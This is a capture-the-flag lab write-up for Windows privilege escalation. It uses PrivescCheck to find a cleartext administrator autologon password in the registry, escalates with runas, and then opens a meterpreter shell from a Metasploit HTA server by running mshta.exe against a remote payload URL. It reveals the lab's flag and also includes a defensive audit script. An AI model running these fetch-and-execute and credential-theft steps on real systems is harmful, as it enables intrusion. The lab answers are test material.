Windows PrivescCheck

This document outlines the steps for a privilege escalation lab using the PrivescCheck PowerShell script on a Windows machine. It details the process of switching users, running the script to find misconfigurations, and ultimately gaining administrator access to read a flag. Additionally, it includes commands for using Metasploit to establish a meterpreter shell on the victim machine.

Uploaded by SelvaKumar Anand

Name: Windows: PrivescCheck

URL: https://attackdefense.com/challengedetails?cid=2404

Type: Privilege Escalation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Switch to the Victim Machine.

Step 2: Open the powershell.exe terminal to check the current user.


We are running as a student user. We will run the PrivescCheck PowerShell script to find
possible misconfiguration issues that can be leveraged for local privilege escalation.

PrivescCheck:

“Privilege Escalation Enumeration Script for Windows. It also gathers various information that
might be useful for exploitation and/or post-exploitation.”

Source: https://github.com/itm4n/PrivescCheck

Step 3: Change to the PrivescCheck folder, C:\Users\student\Desktop\PrivescCheck.

Commands:
cd C:\Users\student\Desktop\PrivescCheck
ls

Step 4: Run the PrivescCheck.ps1 script.

Commands: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

(-ep bypass sets the execution policy to Bypass for this process only, so the unsigned script can be dot-sourced; it does not change the machine-wide policy.)


The scan takes 1-2 minutes to finish. In the resulting report, the WinLogon section shows that PrivescCheck found autologon credentials stored in the Winlogon registry key. Inspecting that output reveals an administrator credential, i.e. administrator:hello_123321
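As an added defender-side example (not part of the lab, and not PrivescCheck's own code), the PowerShell below performs the same check that produced the WinLogon finding above: it reads the Winlogon registry key for an enabled autologon and a cleartext DefaultPassword, reports the exposure without printing the secret, and a second function removes it. The function names are my own; Remove-AutologonPassword assumes an elevated session.

```powershell
# Added example: audit the Winlogon autologon values that a standard user can read
# (the Winlogon key under HKLM\SOFTWARE is world-readable by default), then remediate.
function Get-AutologonExposure {
    [CmdletBinding()]
    param(
        [string]$Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    )
    $wl = Get-ItemProperty -Path $Path -ErrorAction Stop
    $findings = @()

    # AutoAdminLogon = "1" means Windows logs this account in automatically at boot.
    if ($wl.AutoAdminLogon -eq '1') {
        $findings += "AutoAdminLogon is enabled for '$($wl.DefaultDomainName)\$($wl.DefaultUserName)'"
    }

    # A cleartext DefaultPassword is what exposed administrator:<password> in the lab.
    # Report its presence and length only; never echo the secret into a report.
    if (-not [string]::IsNullOrEmpty($wl.DefaultPassword)) {
        $masked = '*' * $wl.DefaultPassword.Length
        $findings += "DefaultPassword is stored in cleartext ($masked)"
    }

    [pscustomobject]@{
        UserName  = $wl.DefaultUserName
        AutoLogon = $wl.AutoAdminLogon
        Findings  = $findings
        Exposed   = ($findings.Count -gt 0)
    }
}

function Remove-AutologonPassword {
    # Remediation (run elevated): delete the cleartext password and disable autologon.
    # If autologon is genuinely required, store the password as an LSA secret
    # (e.g. with the Sysinternals Autologon tool) instead of in this value.
    param([string]$Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon')
    Remove-ItemProperty -Path $Path -Name DefaultPassword -ErrorAction SilentlyContinue
    Set-ItemProperty -Path $Path -Name AutoAdminLogon -Value '0'
}

# Usage: run the audit; call Remove-AutologonPassword only after reviewing the findings.
Get-AutologonExposure | Format-List
```

On the lab machine the audit should report Exposed = True with both findings; after remediation it reports Exposed = False.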

Step 5: Start a command prompt (cmd.exe) as the administrator user, using runas.exe and the discovered credential.

Commands:
runas.exe /user:administrator cmd

Enter the password hello_123321 when prompted, then run the following in the new window:
whoami

The output confirms that cmd.exe is running as administrator.

Switch to the Kali Machine

Step 6: Start msfconsole and run the hta_server module, which serves the payload used to obtain the meterpreter shell.

Commands:
msfconsole -q
use exploit/windows/misc/hta_server
exploit

“This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.”

Copy the generated payload URL, i.e. “http://10.10.15.2:8080/jxEyD3w.hta”, and run it on the victim in cmd.exe with the mshta command to obtain the meterpreter shell.

Note: the payload below must be executed in the cmd.exe window.

Switch to Victim Machine

Step 7: Gain a meterpreter shell.

Commands:
Note: use your own Metasploit HTA server link; it will differ from the one shown here.

Payload: mshta.exe http://10.10.15.2:8080/jxEyD3w.hta

A meterpreter session should open in msfconsole.

Step 8: Read the flag.

Commands:
sessions -i 1
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt
This reveals the flag.

Flag: 2b070a650a92129c2462deae7707b0c5

References

1. Metasploit (https://www.metasploit.com/)
2. HTA Web Server (https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server)
3. Privilege Escalation Enumeration Script for Windows (https://github.com/itm4n/PrivescCheck)
